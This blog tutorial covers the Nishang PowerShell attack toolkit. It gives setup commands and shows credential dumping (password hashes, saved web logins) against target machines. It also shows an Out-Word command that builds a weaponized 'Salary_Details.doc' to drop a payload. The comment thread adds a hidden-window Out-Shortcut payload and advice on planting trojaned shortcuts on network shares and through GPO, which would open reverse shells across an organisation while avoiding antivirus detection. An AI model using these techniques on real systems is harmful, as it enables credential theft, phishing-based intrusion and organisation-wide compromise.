Skip to content

Hacking In Windows Using Nishang With Windows PowerShell, Like A Boss!

As requested, this is the first post of many I’m doing on “hacking” and “pentesting.”  Many admins aren’t comfortable with Linux, or just want to use convenient Windows-based tools, so that’s what we’re going to do.  We’ll talk about a tool called Nishang, which you can use to do many different pentesting and security auditing techniques, using the Windows PowerShell 3.0.

To get started, you will need to download Nishang.  You can click here to go directly to the GibHub page or click the link below to download the latest version directly.  First, here’s a video the creator of Nishang gave at Defcon 21.


Download & Install


Click here to download the latest version of Nishang from GibHub (


Once you’ve downloaded the zip file, extract it, rename the folder to and put it in the root of your c: drive.




Open the Windows PowerShell command prompt as Administrator.  On Windows 10, click the start button and type “powershell” then right click and select “Run as Administrator.”


Quick Tip:  PowerShell 3.0 is installed by default on Windows 10. If you are running an older version of Windows, click here to find out how to download and install PowerShell 3.0.  If you have an older version of Windows, like Windows 7, you will need to do a Shift + Right-Click to get the option to Run as Administrator.


After you’re at the bright blue command prompt, navigate to the folder on the root of your c: drive.


cd ../..

cd .\\


Next, we will run a few commands to allow the Nishang PowerShell scripts to run.  Here is a brief rundown of what we’re doing.

  • Set-ExecutionPolicy Unrestricted – Allows unsigned scripts to be executed
  • Get-ChildItem -Path ‘C:\\’ | Unblock-Files – Unblocks all of the PowerShell scripts within the folder
  • Import-Module .\nishang.psm1 – Imports all of the Nishang scripts / modules for use in PowerShell


Note:  Select “A” for Yes to All when prompted, after setting the execution policy in the first command.

Set-ExecutionPolicy Unrestricted

Get-ChildItem -Path 'C:\\' | Unblock-Files

Import-Module .\nishang.psm1


This is what it should look like in your window so far.




To see a list of all Nishang modules now available via the Powershell, use Get-Command.


Get-Command -Module nishang


There are quite a few, as you can see.  Click here to see an image of the output.


PS C:\> Get-Command -Module nishang

CommandType Name Version Source
----------- ---- ------- ------
Function Add-Exfiltration 0.0 nishang
Function Add-Persistence 0.0 nishang
Function Add-RegBackdoor 0.0 nishang
Function Add-ScrnSaveBackdoor 0.0 nishang
Function Base64ToString 0.0 nishang
Function Check-VM 0.0 nishang
Function Copy-VSS 0.0 nishang
Function Create-MultipleSessions 0.0 nishang
Function DNS_TXT_Pwnage 0.0 nishang
Function Do-Exfiltration 0.0 nishang
Function Download 0.0 nishang
Function Download_Execute 0.0 nishang
Function Download-Execute-PS 0.0 nishang
Function Enable-DuplicateToken 0.0 nishang
Function Execute-Command-MSSQL 0.0 nishang
Function Execute-DNSTXT-Code 0.0 nishang
Function Execute-OnTime 0.0 nishang
Function ExetoText 0.0 nishang
Function FireBuster 0.0 nishang
Function FireListener 0.0 nishang
Function Get-Information 0.0 nishang
Function Get-LsaSecret 0.0 nishang
Function Get-PassHashes 0.0 nishang
Function Get-PassHints 0.0 nishang
Function Get-Unconstrained 0.0 nishang
Function Get-WebCredentials 0.0 nishang
Function Get-Wlan-Keys 0.0 nishang
Function Get-WmiShellOutput 0.0 nishang
Function Gupt-Backdoor 0.0 nishang
Function HTTP-Backdoor 0.0 nishang
Function Invoke-ADSBackdoor 0.0 nishang
Function Invoke-BruteForce 0.0 nishang
Function Invoke-CredentialsPhish 0.0 nishang
Function Invoke-Decode 0.0 nishang
Function Invoke-Encode 0.0 nishang
Function Invoke-Interceptor 0.0 nishang
Function Invoke-JSRatRegsvr 0.0 nishang
Function Invoke-JSRatRundll 0.0 nishang
Function Invoke-Mimikatz 0.0 nishang
Function Invoke-MimikatzWDigestDowngrade 0.0 nishang
Function Invoke-Mimikittenz 0.0 nishang
Function Invoke-NetworkRelay 0.0 nishang
Function Invoke-PortScan 0.0 nishang
Function Invoke-PoshRatHttp 0.0 nishang
Function Invoke-PoshRatHttps 0.0 nishang
Function Invoke-PowerShellIcmp 0.0 nishang
Function Invoke-PowerShellTcp 0.0 nishang
Function Invoke-PowerShellUdp 0.0 nishang
Function Invoke-PowerShellWmi 0.0 nishang
Function Invoke-Prasadhak 0.0 nishang
Function Invoke-PSGcat 0.0 nishang
Function Invoke-PsGcatAgent 0.0 nishang
Function Invoke-PsUACme 0.0 nishang
Function Out-CHM 0.0 nishang
Function Out-DnsTxt 0.0 nishang
Function Out-Excel 0.0 nishang
Function Out-HTA 0.0 nishang
Function Out-Java 0.0 nishang
Function Out-JS 0.0 nishang
Function Out-RundllCommand 0.0 nishang
Function Out-SCF 0.0 nishang
Function Out-SCT 0.0 nishang
Function Out-Shortcut 0.0 nishang
Function Out-WebQuery 0.0 nishang
Function Out-Word 0.0 nishang
Function Parse_Keys 0.0 nishang
Function Remove-Persistence 0.0 nishang
Function Remove-PoshRat 0.0 nishang
Function Remove-Update 0.0 nishang
Function Run-EXEonRemote 0.0 nishang
Function Show-TargetScreen 0.0 nishang
Function Speak 0.0 nishang
Function Start-CaptureServer 0.0 nishang
Function StringtoBase64 0.0 nishang
Function TexttoEXE 0.0 nishang


Nishang Basics

An entire book could easily be written on the various modules included with Nishang.  You can run a script locally to get an idea of what it’s capable of.  For instance, let’s start with the Get-Information command.  From the PowerShell, go ahead and run it.




As you can see, there is an incredible amount of information this module harvests for the attacker.  How much will be extracted from the target machine depends on the operating system and what patches have been installed.  Pen-Testing is an art and it requires a great deal of trial and error.


To get more specific information, such as password hashes, you can use the Get-PassHashes command.  This will dump all of the local account password hashes.  You can run it on your machine to get an idea of what it makes available.  When executed against a target machine it will provide their password hashes.




Here is a screenshot of this command being ran against a Windows 10 workstation with the latest patches installed. The hashes are partially covered for obvious reasons.




Another very useful command is Get-WebCredentials.  When this is executed against a target it will dump any saved usernames and passwords used for websites.




Here is the output of Get-Credentials ran against a target machine.  Identifiable information has been rendered useless, once again, for obvious reasons.




As you can see, one of the dumped passwords was from  That’s a pretty catastrophic security issue.  A majority of people have a bank account tied to their paypal account, and at least a credit card.  Not good!


Advanced Usage


Weaponized Word Document

With Nishang’s Out-Word command, you can embed a payload in a weaponized Microsoft Word .doc file that is instructed to download and execute a powershell meterpreter.  This is an example of a command to do precisely this. It will create a Word document called “Salary_Details.doc” with the payload embedded.


Out-Word -Payload 'powershell.exe -ExecutionPolicy Bypass -noprofile'




As soon as the target opens the Word document and clicks Enable Editing, the payload is delivered and you have owned their machine..




The attacker now has a command line dropped to the target’s machine.  All from a single word document.


Nishang Help Files


Every command included with Nishang includes a PowerShell help file.  This is incredibly useful.  I suggest running the help command against every included command as there is a wealth of useful information.  Included is a description, synopsis, available parameters, syntax, notes, and website links with additional information.

To get help with a particular command, use the Get-Help command.  In this example, we will read the help file on the Invoke-Mimikatz command.


Get-Help Invoke-Mimikatz


As you can see, there is quite a bit of useful information provided.


PS C:\> Get-Help Invoke-Mimikatz -full

Do you want to run Update-Help?
The Update-Help cmdlet downloads the most current Help files for Windows PowerShell modules, and installs them on your
computer. For more information about the Update-Help cmdlet, see
[Y] Yes [N] No [S] Suspend [?] Help (default is "Y"):


This script loads Mimikatz completely in memory.
Invoke-Mimikatz [[-ComputerName] <String[]>] [[-DumpCreds]] [<CommonParameters>]

Invoke-Mimikatz [[-ComputerName] <String[]>] [[-DumpCerts]] [<CommonParameters>]

Invoke-Mimikatz [[-ComputerName] <String[]>] [[-Command] <String>] [<CommonParameters>]
This script leverages Mimikatz 2.1 and Invoke-ReflectivePEInjection to reflectively load Mimikatz completely in
memory. This allows you to do things such as
dump credentials without ever writing the mimikatz binary to disk.
The script has a ComputerName parameter which allows it to be executed against multiple computers.

This script should be able to dump credentials from any version of Windows through Windows 8.1 that has PowerShell
v2 or higher installed.

Reflectively loads Mimikatz 2.1 in memory using PowerShell. Can be used to dump credentials without writing
anything to disk. Can be used for any
functionality provided with Mimikatz.

The script, in near future, will provide additional commands for a variety of attacks possible with Mimikatz.

Function: Invoke-Mimikatz
Author: Joe Bialek, Twitter: @JosephBialek
Mimikatz Author: Benjamin DELPY `gentilkiwi`. Blog: Email: [email protected]
Twitter @gentilkiwi
Required Dependencies: Mimikatz (included)
Optional Dependencies: None
Mimikatz version: 2.1 alpha (17/02/2016)
-ComputerName <String[]>
Optional, an array of computernames to run the script on.

Required? false
Position? 1
Default value
Accept pipeline input? false
Accept wildcard characters? false

-DumpCreds [<SwitchParameter>]
Switch: Use mimikatz to dump credentials out of LSASS.





If you get Permission Denied errors when attempting to install Nashing scripts, then you have not opened an “Administrative” PowerShell command prompt.  This is done by right-clicking the PowerShell shortcut and selecting “Run as Administrator.”  On some older versions of Windows, such as Windows 7, you have to hold down Shift + Right click to get the option to run as administrator.




This guide has taken you through the process of installing Nishang’s PowerShell module and has provided you with some examples of how to use a few of the available tools.  There are countless way this toolkit can be used and this is really just the tip of the iceberg.  I will be publishing additional resources to help guide you through using some more available tools in a more in-depth manner.  But for now, play around with the available commands and see what’s possible.  I have included some links with additional resources below.  I implore you to check them out and use google to find usage examples others have provided.  I hope you’ve found this guide helpful and if you have any questions, please feel free to post in the comments below!


Additional Resources


Nishang Tookit Homepage – High level overview of modules


Nikhil SamratAshok Mittal’s Blog (Author of Nishang, hundreds of examples)


5 thoughts on “Hacking In Windows Using Nishang With Windows PowerShell, Like A Boss!

  1. Danny says:

    Really cool stuff. Another example reason to lock down execution policy across the board via GPO, not just on servers. Wonder what Out-SCF and Out-SCT do.

    • Mike Smith says:

      Out-SCT is a script used to create a .COM (like a .com component file, as in component object model ran by Windows Scripting Host) file capable of executing PowerShell commands and scripts.

      Out-SCF creates an SCF file (like a windows explorer command, sort of like an autorun.ini) can be used for capturing NTLM hash challenges.

    • Mike Smith says:

      Oh yea, and there’s switches you can throw into many of these commands that completly bypass any execution policy settings.

      For instance, you can create a weaponized Microsoft Word file like I described in the post, and use the “-ExecutionPolicy Bypass” and just bypass execution policy all together.

      If you want to make it look even more legit, you could create a weaponized shortcut file to place on their start menu’s recently accessed applications, or replace the default shortcut, pointing to an Microsoft Office app, like MS word or MS excel, with the same type of payload, and configure it to still load the target program so they are clueless. They would just be opening microsoft word from their recently accessed applications list in the start menu. As long as you generated a unique hash to create your payloads no AV will catch it. Here is an example command that should work:

      PS > Out-Shortcut -Payload “-WindowStyle hidden -ExecutionPolicy Bypass -noprofile -noexit -c Get-ChildItem”

      This is some seriously wicked stuff 🙂

      • Mike Smith says:

        And you could take it even one step further and find a network share they can write to. Many network shares contains shortcuts to other shared network folders for convenience. Replace one of those shortcuts with on that has a payload, then every person in their department, and very likely IT, creates a reverse shell back to the attacker every time they use the shortcut, and on every computer or server they use it on. It will never be caught by an antivirus application unless it’s somehow discovered (very unlikely) and submitted to VirusTotal or something along those lines, which is also unlikely to happen.


        • Mike Smith says:

          Once you get access to one server or the credentials of one person with access to AD, burry a shortcut replacement GPO in one of their existing policies to deploy a shortcut for chrome or IE or some other program used by everyone multiple times a day, and within a few minutes of a monday morning you have shells to every computer in their entire infrastructure… MUHHUIAHAHA


Leave a Reply